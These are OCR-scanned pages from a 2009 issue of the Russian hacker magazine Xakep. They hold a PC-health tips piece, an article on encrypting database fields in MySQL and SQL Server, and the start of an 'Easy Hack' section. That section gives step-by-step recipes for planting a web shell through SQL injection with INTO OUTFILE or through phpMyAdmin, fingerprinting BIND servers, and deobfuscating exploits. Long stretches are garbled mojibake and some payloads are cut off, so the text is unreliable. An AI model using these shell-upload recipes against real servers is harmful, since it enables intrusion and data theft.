С работой в IT нереально избавиться от 

сидячего образа жизни перед компьютером, 

но можно постараться свести последствия к 

минимуму. 

Вот тебе три совета, как не стать больным и 

слепым гиком, у которого есть ответ на любой 

вопрос по ядру Windows, но нет элементарного 

здоровья. 

СДЕЛАЙ ПАУЗУ — СКУШАЙ ТВИКС 

Кистевой туннельный синдром запястья, 

искривление позвоночника, боли в шее, лишний 

вес и многое другое — вот угрозы для тех, кто 

слишком много работает за компьютером. Ну, 

или не работает — это уж кому как повезет. В 

любом случае, увлекшись реверсингом или 

иным интересным занятием, можно залипнуть 

на несколько часов и оставаться при этом почти 

неподвижным. Так, как же быть? Брать себе личного 

ассистента в лице утилиты Workrave (http:// 

www.workrave.org/welcome), которая будет 

следить за тем, чтобы ты не перетрудился! Более 

того — силой заставит делать небольшие паузы 

и выполнять зарядку для разных частей тела. И 

понятно, что ты знать не знаешь, как эту самую 

зарядку делать. Тулза сама покажет, как размять 

те части тела, которые попадают в область риска. 

030 

XÀÊÅÐ 04 /124/ 09

pc_zone 

Смена тонов монитора в зависимости от времени 

суток заметно снижает усталость глаз 

Смена тонов монитора в зависимости от 

времени суток заметно снижает усталость 

глаз 

Workrave не даст заработаться и заставит 

сделать паузу 

Внешне прога — небольшое окошко с 

таймерами. Первый таймер — это время, 

через которое нужно просто пол минуты 

передохнуть (микропауза). Второй — сколько 

осталось до 10-минутного перерыва 

(обычно он раз в час). И третий — остаток 

общего рабочего времени. На перерывах 

можно сделать упражнения для кистей рук и 

пальцев, для глаз, плеч и шеи. Само собой, 

работа работе рознь. И один может ходить 

пить чай хоть раз в полчаса, а у другого, дай 

Бог, выпадет лишняя минутка, чтобы сгонять 

по нужде. Поэтому временные интервалы 

нужно настроить по своему усмотрению. По 

себе знаю: когда сильно занят, на все эти 

предупреждения, симпатичные окошки и 

громкие фразы — становится просто положить. 

Получается, что, потратив усилия на 

настройку подобных игрушек, потом перестаешь 

их замечать. Но Workrave игнорировать 

себя не даст! В конфиге можно задать, 

разрешается ли откладывать паузы или нет. 

В самых тяжелых случаях доступна опция 

«Блокировать компьютер». И тут уж ничего 

не поделаешь: либо зарядка, либо ребут :). 

Если уже просчитал варианты и, хихикая, 

собираешься переключиться на стоящий 

рядом ноутбук, знай: ничего не выйдет. 

Прогу можно установить на несколько компьютеров 

сразу (хоть под линуксом, хоть 

под Виндой) и синхронизировать время для 

упражнений. 

СИДЕТЬ НАДО ПРАВИЛЬНО 

Рабочее место нужно подогнать под себя. 

Глупо отказывать себе в хорошем кресле, раз 

проводишь на нем большую часть дня. Для оптимального 

расположения рук, монитора и глаз 

применяются специальные способы расчета, 

но это полный изврат. Зато можно просчитать 

такие параметры через веб-сервис Workspace 

Planner (internalapps.ergotron.com/MirWebTool/ 

ergoTool_metric.html) и постараться учитывать 

их, обустраивая рабочее место. Все расчеты 

базируются на исследованиях еще 1988 года, но 

повода им не верить нет. Кстати: все расчеты по 

умолчанию осуществляются в дюймах, но если 

присмотреться (надеюсь, со зрением, у тебя еще 

все в порядке?), то можно найти ссылку для перевода 

в метрические система исчисления. 

И не забудь общие правила: верхняя часть 

монитора должна располагаться на уровне 

глаз, а клавиатура по высоте должна быть на 

уровне локтей. 

СПАСИ ГЛАЗА 

Неправильное расположение экрана монитора, 

маленький шрифт, слишком светлый 

или темный экран — основные причины 

хронической головной боли у гиков. Обижаясь 

на родителей в детстве, ты, вероятно, не мог 

понять, почему нельзя смотреть телевизор в 

темноте. Светло, темно — какая, блин, разница? 

На самом деле, разница есть! Мало кому 

надо объяснять, как начинает резать глаза 

после нескольких часов перед монитором в 

темноте. Самый верный способ помочь себе — 

пойти спать, послав все дела куда подальше. 

Здоровье-то дороже. Знаю-знаю: сроки горят, 

заказчики что-то требуют, а завтра уже надо 

показать полурабочий вариант новой программы 

боссу. Облегчить страдания способна 

f.lux (www.stereopsis.com/flux). Программа 

просто изменяет цветовой профиль монитора 

в зависимости от времени суток. Ночью глаза 

меньше устают от теплых цветовых тонов, 

днем — от ярких и холодных. Могу сказать по 

собственному опыту: штука реально работает! 

О подобной утилите я задумался, когда увидел, 

что некоторые макбуки сами умеют регулировать 

подсветку монитора в зависимости от 

освещения (определяется встроенной камерой 

или сенсорами в зависимости от модели). 

Казалось бы, такая ерунда, а помогает очень 

здорово. У f.lux никаких сенсоров нет, поэтому 

освещенность она может просчитывать по 

времени суток: для этого в настройках указываются 

координаты твоего местоположения. 

А чтобы ты не лез в справочники или Google, 

тут же доступна ссылка на удобную страничку 

для поиска координат. Версии программы 

есть как для Windows, так Linux и Mac OS X. 

Глазам необходим отдых. Причем — каждые 

40-50 минут. Врачами рекомендуется целый 

ряд методик и упражнений, предназначенных 

для отдыха глаз. Более того, разработаны и 

любопытные программы, которые напоминают 

тебе, когда и какие упражнения нужно делать. 

Для примера: посмотри EyesKeeper (www. 

gi.ru/eyeskeeper) — русскоязычный «напоминатель». 

В нем приведены упражнения для 

отдыха глаз, разработанные специалистами 

НИИ гигиены зрения. Использовать все это 

или нет — дело твое. Можно забить и тихо надеяться, 

что в век генной инженерии, клонов 

и нано-технологий можно будет безвозмездно 

скачать себе новую спину из интернета, а глаза 

пофиксить патчем. Но мы бы рассчитывать 

на это не стали :). z 

XÀÊÅÐ 04 /124/ 09 

021

pc_zone 

БАЗА 

ДАННЫХ 

1C 

ЗАПРОС 

ЗАШИФРОВАННОГО 

ОБЪЕКТА 

Запрос 

с проверкой прав 

ЗАПРОС ЗАШИФРОВАННОГО ОБЪЕКТА 

АВТОРИЗИРОВАННЫМ ПОЛЬЗОВАТЕЛЕМ 

И ХАКЕРОМ В СЛУЧАЕ ПРИМЕНЕНИЯ 

ШИФРОВАНИЯ 

Запрос 

данных 

Расшифрованные 

данные 

Расшифрованные данные 

с помощью 

ключа пользователя 1С 

БАЗА 

ДАННЫХ 

CRYPTO 

БАЗА 

ДАННЫХ 

1C 

ЗАПРОС 

ЗАШИФРОВАННОГО ОБЪЕКТА 

ЗЛОУМЫШЛЕННИКОМ 

Прав 

доступа нет 

Пользователь 1С 

Запрос 

данных 



БАЗА 

ДАННЫХ 

CRYPTO 



АНДРЕЙ КОМАРОВ 

/ KOMAROV@ITDEFENCE.RU / 

Злоумышленник 



Правильные способы защитить данные в таблицах БД 

Как же ошибаются те люди, которые доверяют защиту данных исключительно 

самой СУБД. Мол, если пароль на подключение хороший и 

версия демона — самая последняя, то все будет нормально. Ничего 

подобного. Базы как сливали, так и будут сливать. А наша задача — 

сделать их нечитаемыми для тех, кому они не предназначены. 

>> pc_zone 

Актуальная проблема из мира информационной 

безопасности — обеспечить сохранность 

данных. Есть ситуации, в которых 

даже при наличии серьезной защиты системы, 

сохранность данных оказывается под 

большим вопросом. Как так? Могу привести 

пример из личного опыта, когда в разглашении 

информации был виновен засланный 

сотрудник конкурирующей компании. Находясь 

на рабочем местом и будучи технически 

подкованным, он взламывал сервера баз 

данных банальным брутфорсом через терминальное 

соединение. Базы с клиентами 

«засланец» перепродавал другим компаниям, 

а «интересная» информация о ведении 

бизнеса отправлялась сотрудникам силовых 

структур. Что из этого вышло, объяснять излишне. 

Вообще, имея физический доступ к 

локальной сети, инсайдер мог поступить гораздо 

проще: атаковать программу, которая 

работает с базой данных. Нередко сценарий 

взлома сводится к тому, что из программы 

разными способами извлекаются конфиги 

для подключения к базе. Захватив ту же 1С, 

032 

XÀÊÅÐ 04 /124/ 09

pc_zone 

которая хранит в себе конфиги подключения 

к базе (в том числе, шифрованный обычным 

XOR’ом пароль), злоумышленник получает 

доступ к самой базе. Особо не стесняясь, 

он может ее выкачать, модифицировать 

или просто удалить. Такая брешь в защите 

способна сыграть злую шутку, особенно в 

корпоративной среде. 

В статье я как раз хочу рассказать о том, 

как обезопасить информацию в обычной 

базе данных. Даже если СУБД будет взломана 

или левый человек скопирует данные, 

утечки конфиденциальной информации не 

произойдет! 

ШИФРОВАНИЮ — БЫТЬ! 

Общий подход прост до гениального: раз 

злоумышленник гипотетически сможет 

извлечь данные, надо сделать так, чтобы 

он их не смог прочитать. Информацию 

все равно придется хранить в базе, но… 

ничего не мешает хранить ее в каком 

угодно виде, в том числе зашифрованном! 

Главное, чтобы мы сами потом смогли 

расшифровать :). Компания Spelabs 

(spellabs.ru/spellabsCrypto1C.htm) как-то 

анонсировала продукт, организующий 

дополнительную безопасность бухгалтерских 

1С на уровне шифрования данных, 

причем на полностью прозрачном уровне. 

Пользовательские приложения, не подозревая 

о надстройке, работали в обычном 

режиме. Увы, компания прекратила разработку 

этого направления. Но реально 

обойтись и без подобных инструментов, 

ведь для шифрования сгодятся даже штатные 

средства СУБД! 

Любая современная СУБД, если это, конечно, 

не собранная на коленке курсовая, может 

похвастаться достаточно надежными механизмами 

шифрования данных. В той же 

самой MySQL я по памяти насчитал около 

14 соответствующих функций, которые тебе 

наверняка хорошо известны: 

AES_ENCRYPT() Øèôðîâàíèå AES 

AES_DECRYPT() Ðàñøèôðîâêà AES 

COMPRESS() Âîçâðàùåíèå ðåçóëüòàòà 

â áèíàðíîì âèäå 

DES_ENCRYPT() Øèôðîâàíèå DES 

DES_DECRYPT() Äåøèôðîâàíèå DES 

ENCODE() Øèôðîâàíèå ñòðîêè 

ïîâåðõíîñòíûì ïàðîëåì (íà âûõîäå 

ïîëó÷àåòñÿ øèôðîâàííîå ñëîâî ïåðâîíà÷àëüíîé 

«plaintext» äëèíû) 

DECODE() Ðàñøèôðîâêà òåêñòà, 

îáðàáîòàííîãî ôóíêöèåé ENCODE() 

ENCRYPT() Øèôðîâàíèå ñ ïîìîùüþ 

Unix’îâîãî ñèñòåìíîãî âûçîâà crypt 

MD5() 

Ïîäñ÷åò MD-5 ñóììû 

SHA1(), SHA() Ïîäñ÷åò SHA-1 (160- 

áèò) 

Для их применения надо лишь чуть изменить 

свои SQL-запросы, добавив в нужном 

месте функции AES_ENCRYPT() или 

XÀÊÅÐ 04 /124/ 09 

DES_ENCRYPT(), которые считаются наиболее 

надежными в MySQL на текущий момент. 

Например, так: 

INSERT INTO t VALUES (1,AES_ 

ENCRYPT('text','password')); 

Приятно признать, что хорошие программисты 

эти функции используют. Часто во время 

проведения SQL-инжекции мне приходилось 

ломать голову и определять функцию, 

которую использовал кодер для крипточки 

данных. В результате, требуется производить 

те же AES_DECRYPT(AES_ENCRYPT()) наряду 

с unhex(hex()). 

T-SQL 

Помимо симметричного шифрования, когда 

упаковка и распаковка текста производятся 

одним и тем же ключом (общим для двух 

участников обмена сообщениями), поддерживается 

и ассиметричное криптование. Идея 

ассиметричных алгоритмов подразумевает 

наличие двух ключей — открытого и закрытого 

(секретного). Один из них используется 

для шифрования информации, а другой — 

для дешифрования. Если кодирование осуществляется 

с помощью открытого ключа, то 

расшифровать такие данные можно только с 

помощью парного ему закрытого. Предлагаю 

разобраться с этим на примере Microsoft 

SQL Server, который часто используется в 

корпоративных порталах и сложных приложениях. 

Для шифрования применяются 

функции T-SQL, представляющие собой 

специальное дополнение языка SQL. Оно 

поддерживает управляющие операторы, 

локальные переменные и различные дополнительные 

функции. Одна из таких функций 

— EncryptByCert(), используемая для ассиметричного 

шифрования данных с помощью 

сертификатов. Открытым ключом тут выступает 

сертификат. Только откуда этот сертификат 

взять? Ответ прост — сгенерировать с помощью 

другой специальной функции. Покажу 

на примере, как можно сгенерировать сертификат 

с именем для andrej базы «Bank» с 

помощью хранимой процедуры: 

USE Bank; 

CREATE CERTIFICATE andrej 

ENCRYPTION BY PASSWORD = 

'pGFD4bb925DGvbd2439587y' 

# Äëÿ ãåíåðàöèè ñ èñïîëüçîâàíèåì 

ïîäãðóçêè èç ôàéëà 

# FROM FILE = 'c:\Shipping\Certs\ 

Shipping11.cer' 

# WITH PRIVATE KEY (FILE = 'c:\ 

Shipping\Certs\Shipping11.pvk', 

WITH SUBJECT = 'Employers 

Access', 

EXPIRY_DATE = '10/31/2009'; 

GO 

У нас создался сертификат! Теперь его можно 

без проблем использовать для размещения в 

таблице зашифрованных записей, выполняя 

привычные SQL-запросы: 

INSERT INTO [ÁÀÇÀ].[ÒÀÁËÈÖÀ] 

values( N'ÄÀÍÍÛÅ ÄËß ÇÀØÈÔÐÎÂÊÈ', 

EncryptByCert(Cert_ID('andrej'), 

@cleartext) ); 

GO 

В этом примере неформатированный текст 

из переменной @cleartext шифруется сертификатом 

с именем «andrej». Зашифрованные 

данные помещаются в таблицу «ТАБЛИЦА». 

Уточню, что данные могут быть расшифрованы 

только с помощью соответствующего 

закрытого ключа (как уже было сказано, 

«приватного»). 

Имя функции для обратного преобразования 

угадать несложно: DecryptByCert(). 

А вот синтаксис более хитер, и с ним все 

чуть сложнее. Дело в том, что на приватный 

ключ, как правило, закладывается 

дополнительный пароль (passphrase). Его 

необходимо ввести, и по этой причине он 

обязательно будет присутствовать в коде 

запроса или процедуры. Это не очень хорошо, 

потому что его можно быстро увести. Но 

с этим мы разберемся позже, когда поговорим 

о безопасности хранимых процедур. 

А пока — код для извлечения данных из 

шифрованной БД: 

SELECT convert(nvarchar(max), 

DecryptByCert(Cert_Id('andrej'), 

ProtectedData, 

N'pGFD4bb925DGvbd2439587y')) 

FROM [ÁÀÇÀ].[ÒÀÁËÈÖÀ] 

WHERE Description 

= N’Employers Access’; 

GO 

В этом примере производится выборка 

строк из таблицы [БАЗА].[ТАБЛИЦА], 

помеченных как «Employers Access». 

Пример дешифрует зашифрованный 

текст с помощью закрытого ключа сертификата 

«Andrej» и дополнительного 

пароля pGFD4bb925DGvbd2439587y. 

Расшифрованные данные преобразуются 

из типа varbinary в тип nvarchar. 

Надо сказать, что ассиметричные преобразования 

гораздо более накладны, 

чем шифрование и дешифрование с 

использованием симметричного ключа. 

Поэтому использование ассиметричного 

шифрования не рекомендуется при работе 

с большими объемами данных, например, 

таблицами пользовательских данных. Это 

важно учитывать при особо больших базах, 

а также базах, структура которых не приведена 

к одной из нормальных форм. 

ПРЯЧЕМ ХРАНИМЫЕ ПРОЦЕДУРЫ! 

Если ты не заметил, многое упирается в 

то, что вся конфиденциальность и целостность 

завязана на использование хранимых 

033

pc_zone 

info 

• Не забывай о 

самых простых истинах 

традиционной 

криптографии: 

• Чем более накручен 

алгоритм шифрования, 

тем больше 

ресурсов процессора 

он будет кушать; 

• Ассиметричная 

криптография 

обеспечивает более 

надежную защиту, 

чем симметричная 

(даже с ключами 

одинаковой длины), 

но ее исполнение в 

базах может ощутимо 

замедлить весь процесс 

работы; 

Вместо кода процедуры — сплошные знаки вопроса. Взломщик в обломе 

• Действия по 

шифрованию базы 

напрямую связаны 

с модификацией 

обращений клиента. 

Увы, возможность 

«прозрачного» 

шифрования базы на 

сегодняшний день 

существует только в 

MSSQL 2008 (в версии 

Enterprise). Эта 

функция именуется 

там TDE (Transparant 

Database Encryption). 

процедур или функций. Получается, что, получив к ним 

доступ и грамотно проанализировав их код, любой 

опытный хакер сможет преобразовать шифрованную 

белиберду в исходный текст. Конечно, добраться до 

кода процедур далеко не всегда реально, потому здесь 

всплывает вопрос об утечке программной начинки 

производства, а именно — логике ПО. Но именно по 

этой причине необходимо прибегать к шифрованию 

процедур и функций в базе. Одно из самых популярных 

и удачных средств для таких действий — это программа 

SQL Shield (www.sql-shield.com). После несложной 

установки приложения не забудь указывать дополнительный 

флаг /*sqlshield*/ с выражением «WITH 

ENCRYPTION» всякий раз, когда будешь создавать 

защищенную процедуру. Вот пример функции, которая 

исполняет простейший запрос к базе: 

CREATE PROCEDURE MyTest 

WITH /*sqlshield*/ ENCRYPTION 

AS 

SELECT 2+2 

Исполняем процедуру и получаем: 

MyTest 

> 4 

Проверим, в каком виде хранится процедура, с помощью 

специального средства для ковыряния в файлах базы. 

Подойдет SQL Server Syscomments Decryptor (www. 

geocities.com/d0mn4r/dSQLSRVD.html), который при 

отображении текста процедуры показывает одни лишь 

знаки вопроса. Все работает! 

Ïðèìåð èç ëè÷íîãî îïûòà 

Ñîòðóäíèêàìè îäíîé êîìïàíèè ïëàòåæíî-êàðòî÷íîãî ñåêòîðà âåëàñü áàçà äàííûõ äëÿ âûäà÷è çàðïëàò. Äëÿ ïðîñòîãî 

ïîíèìàíèÿ, — ïóñòü ýòî áóäåò ïðèìåðíî ñëåäóþùàÿ ñòðóêòóðà: 

warning 

Использование 

функций шифрования 

SQL Server 

совместно 

с параметром 

ANSI_PADDING 

OFF может привести 

к потере данных 

из-за неявных 

преобразований! 

034 

ID LastName FirstName Emp Sum 

354 Somov Oleg IT-Manager M0x8900f56543 

643 Antipova Alexandra Director 4343Lax#dsdsss 

411 Timurov Valeriy Technical Dep. 0x2322322222 

Âûáîðêó èç áàçû ÿ ïðèâåë àáñîëþòíî ïðîèçâîëüíóþ, à òåïåðü ñóòü èäåè. «Áåçîïàñíèêàìè» êîìïàíèè áûëî ïðèíÿòî 

âïîëíå áëàãîðîäíîå ðåøåíèå — øèôðîâàòü äàííûå î çàðïëàòàõ, êîòîðûå î÷åíü ÷àñòî áûâàþò «ñåðûìè». Èíñàéäåð 

ïîëó÷èë äîñòóï ê áàçå è ñèëüíî îáëîìàëñÿ, çàèìåâ èíôîðìàöèþ â òàêîì âèäå. Îäíàêî, îí íå îò÷àÿëñÿ è ïðîäåëàë 

ñëåäóþùèé ôîêóñ. Ðåçîííî ïðåäïîëîæèâ, ÷òî ÷åëîâåê ñ äîëæíîñòüþ äèðåêòîðà äîëæåí ïîëó÷àòü áîëüøå, ÷åì ïðîñòîé 

ìåíåäæåð, îí ïîìåíÿë ñîîòâåòñòâóþùèå ïîëÿ ñî çíà÷åíèÿìè çàðïëàò îäíî íà äðóãîå, òåì ñàìûì — ïîäëîæèâ áóõãàëòåðñêîìó 

îòäåëó àáñîëþòíî ëåâóþ èíôîðìàöèþ. Â áëàãîïîëó÷íûé äåíü òàêàÿ âåùü ïðîêàòèëà, è âñå áåçîïàñíèêè 

áûëè óâîëåíû. Äëÿ ñïðàâêè: ýòèì ñîòðóäíèêîì áûë íå ÿ, êàê âïðî÷åì, è íå áåçîïàñíèêîì. 

XÀÊÅÐ 04 /124/ 09

pc_zone 

Òàê äåëàòü íå ñòîèò! 

Посчитанные временные результаты для 

применения крипто-алгоритмов в среде SQLсервера 

2005 

КАК ОБЛЕГЧИТЬ СЕБЕ ЖИЗНЬ? 

Â SQL Server ìîæíî ñîçäàâàòü ÷åòûðå òèïà îáúåêòîâ (õðàíèìûå ïðîöåäóðû, ïðåäñòàâëåíèÿ, 

ïîëüçîâàòåëüñêèå ôóíêöèè è òðèããåðû) ñ ïàðàìåòðîì WITH ENCRYPTION. Ýòîò ïàðàìåòð 

ïîçâîëÿåò çàøèôðîâàòü îïðåäåëåíèå îáúåêòà òàêèì îáðàçîì, ÷òî òîò ìîæíî áóäåò 

èñïîëüçîâàòü, íî ïîëó÷èòü åãî îïðåäåëåíèå ñòàíäàðòíûìè ñïîñîáàìè ñòàíåò íåâîçìîæíî. 

Ýòî ñðåäñòâî ðåêîìåíäóåòñÿ è Microsoft. Ê ñîæàëåíèþ, íà ïðàêòèêå íèêàêîé çàùèòû 

ïðèìåíåíèå ñòàíäàðòíûõ ñðåäñòâ øèôðîâàíèÿ íå îáåñïå÷èâàåò! Àëãîðèòì, èñïîëüçóåìûé 

ïðè øèôðîâàíèè îïðåäåëåíèé îáúåêòîâ, âûãëÿäèò òàê: 

1) SQL Server áåðåò GUID òîé áàçû äàííûõ, â êîòîðîé ñîçäàåòñÿ îáúåêò, è çíà÷åíèå ñòîëáöà 

colid òàáëèöû syscomments äëÿ ñîçäàâàåìîãî îáúåêòà (÷àùå âñåãî, åãî çíà÷åíèå — 1 èëè 2) 

è ïðîèçâîäèò èõ êîíêàòåíàöèþ; 

2) Èç ïîëó÷åííîãî çíà÷åíèÿ ãåíåðèðóåòñÿ êëþ÷ ïðè ïîìîùè àëãîðèòìà SHA; 

3) Ýòîò õåø èñïîëüçóåòñÿ â êà÷åñòâå âõîäÿùåãî çíà÷åíèÿ ïðè ïðèìåíåíèè åùå îäíîãî 

àëãîðèòìà õåøèðîâàíèÿ — RSA. Ñ åãî ïîìîùüþ ãåíåðèðóåòñÿ íàáîð ñèìâîëîâ, ðàâíûé ïî 

äëèíå øèôðóåìîìó îïðåäåëåíèþ îáúåêòà; 

4) Ñ ýòèì íàáîðîì ñèìâîëîâ è ñ ðåàëüíûì îïðåäåëåíèåì îáúåêòà ïðîèçâîäèòñÿ îïåðàöèÿ 

XOR. Â ðåçóëüòàòå ïîëó÷àþòñÿ äàííûå, êîòîðûå ïîìåùàþòñÿ â ñòîëáåö ctext òàáëèöû 

syscomments. 

Ó ýòîé ñõåìû åñòü äâà ñëàáûõ ìåñòà: 

• Íàì íè÷åãî íå ìåøàåò çàèìåòü èñõîäíûå çíà÷åíèÿ (GUID è colid) äëÿ âûïîëíåíèÿ òåõ 

æå ñàìûõ îïåðàöèé è ïîëó÷èòü êëþ÷ íà ðàñøèôðîâêó. Ýòî ìîæíî ñäåëàòü, íàïðèìåð, 

èñïîëüçîâàâ óòèëèòó dSQLSRVD. Ïðàâäà, äëÿ ïîëó÷åíèÿ GUID áàçû äàííûõ (è äëÿ çàïóñêà 

ýòîé óòèëèòû) íàì íóæíû ïðàâà ñèñòåìíîãî àäìèíèñòðàòîðà; 

• Åñëè ó íàñ åñòü ïðàâà íà ñîçäàíèå îáúåêòîâ â áàçå äàííûõ, ìîæíî ñãåíåðèðîâàòü òî÷íî 

òàêîé æå êëþ÷ äëÿ îáúåêòà, îïðåäåëåíèå êîòîðîãî íàì óæå èçâåñòíî (ïóòåì ñðàâíåíèÿ 

øèôðîâàííîãî îïðåäåëåíèÿ ñ íåçàøèôðîâàííûì). Íó è — èñïîëüçîâàòü åãî äëÿ ðàñøèôðîâêè 

çíà÷åíèÿ äðóãîãî îáúåêòà. 

Êàê ìîæíî ðàñøèôðîâàòü çàøèôðîâàííûå îáúåêòû íà SQL Server? Åñòü äâà âàðèàíòà: 

• Èñïîëüçîâàòü óòèëèòó dSQLSRVD. Îíà ïîçâîëÿåò âûáðàòü ëþáîé çàøèôðîâàííûé îáúåêò 

íà ñåðâåðå è çàïèñàòü åãî îïðåäåëåíèå â òåêñòîâûé ôàéë; 

• Èñïîëüçîâàòü õðàíèìóþ ïðîöåäóðó DECRYPT2K. Êîä íà ñîçäàíèå äàííûõ õðàíèìûõ 

ïðîöåäóð (â ðàçíûõ âàðèàíòàõ è ñ ðàçíûìè îáúÿñíåíèÿìè), êîòîðûå ðàñøèôðîâûâàþò 

îïðåäåëåíèå çàøèôðîâàííûõ îáúåêòîâ, ëåãêî íàéòè ÷åðåç Google. 

XP_Crypt избавляет от ручного геморроя по шифрованию нужных полей, позволяя настроить все 

через свою удобную оболочку 

В заключение — не менее интересный продукт 

XP_CRYPT (xpcrypt.com). Это средство 

осуществляет весь тот геморрой, который мы 

только что проделали вручную. Все, что от 

тебя требуется, — скачать дистрибутив проги, 

установить ее на сервер (к сожалению, есть 

версия только для Винды), обозначить свою 

базу данных и начать химию с таблицами с 

помощью удобного GUI-интерфейса. 

Организуем знакомство на примере из 

практики. Предположим, у нас есть интернет-магазин, 

где каким-то образом хранятся 

данные о кредитных картах клиентов 

(распространенная ситуация, хотя это 

категорически запрещено!). Наша задача 

— зашифровать конкретные данные о 

клиентах, т.е. поля с паролем, номером 

кредитной карточки и т.п. Пока мы ничего 

не делали, при запросе SELECT * FROM 

tbl_CCards, СУБД возвращает все в открытом 

виде: 

Username Password CredCardNum 

james god 1234567890123456 

lucas sex 2894787650102827 

anna love 3234563638716434 

Напишем внешнюю функцию UDF (расшифровывается, 

как «User-Defined-Function», 

подробности — в последнем выпуске «Обзора 

эксплоитов») для преобразования строки в 

SHA-хеш: 

CREATE FUNCTION ud_MakeSHA1 (@ 

clearpass VARCHAR (8000) ) 

RETURNS VARCHAR (40) 

AS 

BEGIN 

XÀÊÅÐ 04 /124/ 09 

035

pc_zone 

С помощью тулзы SysComments Decryptor находим хранимую процедуру и убеждаемся, что она 

зашифрована 

Создаем простейшую хранимую процедуру 

У разработчика есть два варианта: использовать встроенное в MS SQL 

шифрование, что не очень хорошо, или воспользоваться возможностями 

SQL Shield 

DECLARE @ret as VARCHAR(40) 

EXEC master..xp_sha1 @clearpass,@ 

ret OUTPUT 

RETURN @ret 

END 

Отдаем команду: UPDATE tbl_CCards SET 

password = dbo.ud_MakeSHA1(Password). 

После чего еще раз проверяем содержимое 

базы той же командой. Что видим? Все 

зашифровано, все пароли захешировались! 

Теперь нужно не забыть о том, что мы 

используем шифрование при обращении 

к базе. В нашем случае, когда ты будешь 

делать авторизацию пользователей, процедура 

проверки пароля по хешу будет выглядеть 

примерно так: 

CREATE FUNCTION ud_CheckUser (@ 

username VARCHAR(16),@clear_pass 

036 

VARCHAR (16)) 

RETURNS INTEGER 

AS BEGIN 

DECLARE @res INTEGER 

SELECT @res = count(*) FROM tbl_ 

CCards where username=@username AND 

password=dbo.ud_MakeSHA1(@clear_ 

pass) 

IF @res > 1 SELECT @res= 0 

RETURN @res 

END 

Проверяем исполнением команды: 

SELECT 

dbo.ud_CheckUser 

('anna’,'kolbaska') 

>1 (íåïðàâèëüíî) 

SELECT 

dbo.ud_CheckUser 

('anna','love') 

>0 (îêåéíî!) 

К шифрованию номера кредитной карты 

надо подойти более серьезно. Впрочем, 

мы не будем вникать в различного рода 

стандарты по информационной безопасности 

в платежно-карточной сфере (вроде 

PCI; хотя организации, работающие с кредитными 

картами, безусловно обязаны это 

делать). В бесплатной версии XP_CRYPT 

существует возможность генерации только 

256-битного ключа RSA. 

Вот этим-то как раз и можно воспользоваться 

(пусть упомянутый стандарт и требует, 

как минимум, 768-битного ключа). Я 

бы мог сейчас привести код по генерации 

публичного и приватного ключа, но… поступим 

проще. Все действия можно выполнить 

из понятного графического интерфейса, и 

во многих случаях оставить все на совести 

программы, не написав ни строчки кода. 

И поверь, будет работать!z 

XÀÊÅÐ 04 /124/ 09

взлом 

Easy Hack} 

ХАКЕРСКИЕ 

СЕКРЕТЫ 

ПРОСТЫХ ВЕЩЕЙ 

ЛЕОНИД «R0ID» СТРОЙКОВ 

/ R0ID@MAIL.RU / 

АНДРЕЙ «SKVOZ» КОМАРОВ 


PSYCHO. 

/ X0WL.X0WL@GMAIL.COM / 

¹1 

ЗАДАЧА: ЗАЛИТЬ ШЕЛЛ СРЕДСТВАМИ MYSQL 

РЕШЕНИЕ: 

1. Ищем на Web-сервере директории, доступные для записи. Заветный 

каталог может присутствовать в этом списке: 

/templates_compiled/ 

/templates_c/ 

/templates/ 

/temporary/ 

/images/ 

/cache/ 

/temp/ 

/files/ 

2. Мы уже подобрали колонки (допустим, их будет 4), и выполняем запрос: 

UNION SELECT "",2,3,4 

INTO OUTFILE "/var/www/html/temp/c.php" -- 

3. Пользуемся шеллом по адресу http://victim.com/temp/c.php. 

¹2 

ЗАДАЧА: ЗАЛИТЬ ШЕЛЛ СРЕДСТВАМИ PHPMYADMIN 


1. Каким-либо образом получаем доступ к PhpMyAdmin. 

2. Для эстетики и удобства создаем новую базу: 

CREATE DATABASE 'backdoor' 

3. Ищем установочный путь базы 

SELECT @@datadir 

4. Выполняем запрос на создание таблицы: 

CREATE TABLE backdoor( 

Stack TEXT 

) TYPE=MYISaM; 

INSERT INTO backdoor(Stack) 

VALUES( 

'

взлом 

¹4 

ЗАДАЧА: ОТЛИЧИТЬ BIND 8 ОТ BIND 9, УЧИТЫВАЯ, ЧТО АДМИНИС- 

ТРАТОР УДАЛИЛ ПАРАМЕТР ВЕРСИИ В КОНФИГУРАЦИОННЫХ 

ФАЙЛАХ ДЕМОНА 


Принципиальное отличие — в Bind 9 (начиная с версии 9.1.0) появилась 

специальная служебная CHAOS-запись «authors». Для проверки 

этого параметра можно использовать штатные средства операционной 

системы. 

1. linux/freebsd 

dig ns.example.com authors.bind chaos txt 

2. windows/linux/freebsd 

% nslookup -q=txt -class=CHAOS authors.bind. ns.example.com 

Server: ns.example.com 

Address: 23.23.23.23 

authors.bind text = «Bob Halley» 

authors.bind text = «Mark Andrews» 

authors.bind text = «James Brister» 

authors.bind text = «Michael Graff» 

authors.bind text = «David Lawrence» 

authors.bind text = «Michael Sawyer» 

authors.bind text = «Brian Wellington» 

authors.bind text = «Andreas Gustafsson» 

3. Получен ответ с «пасхальным яйцом» от разработчиков — следовательно, 

перед нами девятая ветка! Чтобы выявить и предотвратить такое 

обнаружение, администратор может предпринять следующую сигнатуру: 

alert UDP $EXTERNAL any -> $INTERNAL 53 (msg: "IDS480/ 

named-probe-authors"; 

content: "|07|authors|04|bind»; depth: 32; offset: 12; 

nocase;) 

В ней содержится синтаксис для мониторинга UDP-транспорта по 53 порту, по 

содержанию, приведенному в тексте запроса, с заданной глубиной поиска. 

¹5 

ЗАДАЧА: РАСШИФРОВАТЬ ОБФУСЦИРОВАННЫЙ ЭКСПЛОИТ 


Задача особенно актуальна, потому что таким макаром можно охотиться 

за новыми образцами сплоитов. В этом плане очень пригодится 

тулза под названием Malzilla (malzilla.sourceforge.net). Она содержит 

в себе десятки алгоритмов для дешифровки, среди которых unescapeпоследовательность, 

UCS2-кодировка JS и так далее. Итак, порядок 

действий: 

1. Копируем все вредоносное шифрованное содержимое на вкладку 

«Download». 

2. Жмем «Send script to Decoder», затем «Run script». 

3. В ответ получаем дешифрованный (или почти дешифрованный) 

сегментами сорец и линк на подгрузку файла. 

4. Если сделать это в один клик не получилось, играемся с «Misc 

decoders». 

Ресурсы, отслеживающие malware-активность онлайн: 

malwaredomainlist.com, zeustracker.abuse.ch. 

Дешифровка на лету! На выходе Malzilla показала линк с вредоносным .exe и деобфусцированный исходник эксплоита 

XÀÊÅÐ 04 /124/ 09 

039

взлом 

¹6 

ЗАДАЧА: НАПИСАТЬ ICQ-СПАМЕР НА PHP 


